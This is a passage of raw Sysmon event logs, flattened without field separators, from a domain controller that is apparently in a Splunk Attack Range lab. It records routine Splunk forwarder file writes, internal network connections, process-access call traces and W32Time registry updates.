Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A62CD1298AE2E32763FB45C4829EA6EA,SHA256=F455779A26618A1EF3D09F6D9751B4D02FE1C7FBCAC885085AD09722AF820809,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:08.617{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A126353C8007DE9CF518DB7724864DDF,SHA256=B763D1E75D7B6EC34E0581B20E353B30C259C744337B5F39C10051497E4C8C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:08.288{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33490B50EA96C0461A02FA54684E2731,SHA256=336D78A0CD22768D1CFCF109550C320D6A3C3673F4712F3E152D568C876C7A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:08.288{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A97CF7CD349D86B4E74DD212331EEE12,SHA256=B962F7D6F8D701129844CF0CF4B839B94251607027CF0FA0A134743039EFE876,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:05.508{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52327-false10.0.1.12-8000- 23542300x80000000000000001765259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:09.629{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3629DBCF525E59BB2FA07B89FFBAEA70,SHA256=CB2B419E90CDCC3A88607D9ABBE8D4EA5D3E1FE2E1FF330FAC548D1D790432C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:10.629{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F3F12B873ED36A1DDA9B1814477C7C,SHA256=96F85FD0B60506964669DA4EC56028C693E9F810D2179BFD3D8382A2F04EF814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:11.632{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=035C6768225632FF5D67065272768B40,SHA256=498DF2F92C7DB9EE88D48A4A98CE06BAF5572851BE90C7B56F2138ED69620AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:12.648{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC53F1D43EB9806D3584BD3137DA1DB,SHA256=A2E35BD0FCE57714A6D567E0306D94AAFAB52B1DEB296B82E09BA25D48D99590,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:12.085{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D3E41ABE53091A1417021A14BB23E486,SHA256=A3AF0D984560AC426FEA4E8D97CC4F945A999E592BDBC15C692D6BAF5531ADCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:13.663{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48297C6F8D6DF22588462936BE15E5F2,SHA256=AD23C7FD7BE1366E95176380F97BE34CDB49C5825FF9372D76574EBF7AA34A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:14.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FCA55C0D1700C0E5EFF7DCED5791BBC,SHA256=50C84436259AECBA16BC0EFE504D9C608F5AF4297175BC1A16AFD62BDA01A6C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:14.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33490B50EA96C0461A02FA54684E2731,SHA256=336D78A0CD22768D1CFCF109550C320D6A3C3673F4712F3E152D568C876C7A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:05.839{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C5F5BCC5A8395A1C6C7B90C14273279,SHA256=82DD79180ECE2CAAF7EB933F91D359C9AA8389B95190B0CE928475653C132041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:06.855{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9319CB33006AA024290C4F27DEB67164,SHA256=53191C72686D5C846BF97236E7A9198ACF3922CC54C3D907E239F9EA6A817546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:06.777{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94BD440F841C3DEEE1EC73A2913DD2C2,SHA256=675C4FA136D32B9ECB47D5ED9AFD057A9A9B7C80D1BBADA8CA1E35C421FE6FBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:06.668{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:07.949{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31917BCC2725F428FD4E69E55CBE7C2,SHA256=61E0136BB762F903104A2554154893D46F5F54440692507517D4B1B9AE432BCD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:03.397{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53840- 23542300x80000000000000002199670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:08.980{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7CCF00BCE54C7475E9EEE20FA2ACF8A,SHA256=AB2DFCCC2F1EBC8129C9E8B29658B79A082191FF4E7E9132CDE24FE3C2088EA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:04.413{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53840- 354300x80000000000000002199668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:04.085{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55065-false10.0.1.12-8000- 23542300x80000000000000002199672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:09.996{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C96A87A9F20EDF2822C2A54FE91448B3,SHA256=A0DF3354CCDFE7FAE9CEA372F59CF2405C96EBC3FDEA91EA2368652E790B5CD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:04.491{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55066-false10.0.1.12-8089- 10341000x80000000000000002199675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:10.043{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002199674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:09.996{5ABCFE62-842F-603E-0F00-00000000AD01}296424C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:09.996{5ABCFE62-842F-603E-0F00-00000000AD01}296424C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002199679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:07.882{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55067-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002199678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:07.882{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55067-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 23542300x80000000000000002199677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:11.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCFA4635D35E98384A8B464CDE39C5F1,SHA256=347376F8EBB62ED5FA19FD228E2A7DD17AC2D5AFC41C13DBC08CCD2973BA1C91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:11.011{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BF7922D3F50D368A880ACF761EA0C7C,SHA256=89B99DAD57D7C4A6A5D2D219FC0EA46D7430EDB0DF3334DE8C5DBB83308A2AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:12.027{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C39BC84C26FFED0474EEAF0B2CED0637,SHA256=0A34710ED2D60E581F4034531B418270D9A0B312A7BBFC9BA07D30C77BF45516,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:09.913{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55068-false10.0.1.12-8000- 13241300x80000000000000002199692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000002199691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x094ca252) 13241300x80000000000000002199690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f4-0xeaba0c86) 13241300x80000000000000002199689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fd-0x4c7e7486) 13241300x80000000000000002199688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71105-0xae42dc86) 13241300x80000000000000002199687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000002199686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x094ca252) 13241300x80000000000000002199685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f4-0xeaba0c86) 13241300x80000000000000002199684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fd-0x4c7e7486) 13241300x80000000000000002199683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:50:13.683{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71105-0xae42dc86) 23542300x80000000000000002199682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:13.074{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31FB0FE4C8D2CEA4D5C32126FFAC992A,SHA256=D4BCA3DDB0739996D85CE830B51ADCB47D873B137E6E756261DA84C54DCFE74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:13.043{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79FDAE276B58776A6F95439AAECA1F1,SHA256=B6DE7F7608EADDCC8841D250548B7795E5733E38E86368C46EEF30868D7177A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:14.652{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1310040D39ACFF4F32C07A696AF1F4B,SHA256=03C5F1611615203AD01781D093291D9E01EEE5BB4B337C8EE72869C58F02A0F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:14.058{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0676E67C1E02AC8BC16A8C96398981F6,SHA256=3B3D752627F6257A9CDF12C01B9F69BADAA39D6AB7D9234175EFB609C3DBF7FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:15.074{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CED4CC5EA3F963067FA8FA4BCCD88ADD,SHA256=55C3F6BC50FEBDA2FF36F0B06F9A3865E2BC0E2B5000DB5A7157982F54F64463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:16.605{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8E2E9B740DA0F71A7BE5EEA2FA6C9AB,SHA256=EE62D36B1B3607A0A70BCBDAFC52274B977FC35E51723DF56BFF586867CD239A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:16.074{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17215369FD878C5BCCDFC1DE93771CB,SHA256=064C3AF302C9CD38C99CEB4D576C13943B95CA651C0857F74B927CAEC39EA0D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199707Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E599-6040-C14D-00000000AD01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 